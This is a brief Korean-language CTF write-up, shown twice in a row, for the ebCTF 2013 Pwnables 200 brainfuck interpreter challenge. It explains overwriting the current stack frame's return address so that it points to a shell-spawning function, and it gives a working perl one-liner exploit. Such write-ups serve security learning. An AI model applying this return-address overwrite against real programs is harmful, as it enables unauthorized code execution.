http://shell-storm.org/repo/CTF/EbCTF-2013-08/Pwnables/200/
brainfuck문제인데, 쉽다.
pwable.kr처럼 gotoverwrite로 해결할 수는 없고,(bf이 스택영역을 사용하기 때문) 간단히 - 를 이용해 현재 스택프레임의 ret을 조절해서 shell을 실행하는 함수의 주소로 바꿔주면 된다.
(perl -e 'print ">"x51,"-"x47';cat)|./bf
CTF/ebCTF
http://shell-storm.org/repo/CTF/EbCTF-2013-08/Pwnables/200/
brainfuck문제인데, 쉽다.
pwable.kr처럼 gotoverwrite로 해결할 수는 없고,(bf이 스택영역을 사용하기 때문) 간단히 - 를 이용해 현재 스택프레임의 ret을 조절해서 shell을 실행하는 함수의 주소로 바꿔주면 된다.
(perl -e 'print ">"x51,"-"x47';cat)|./bf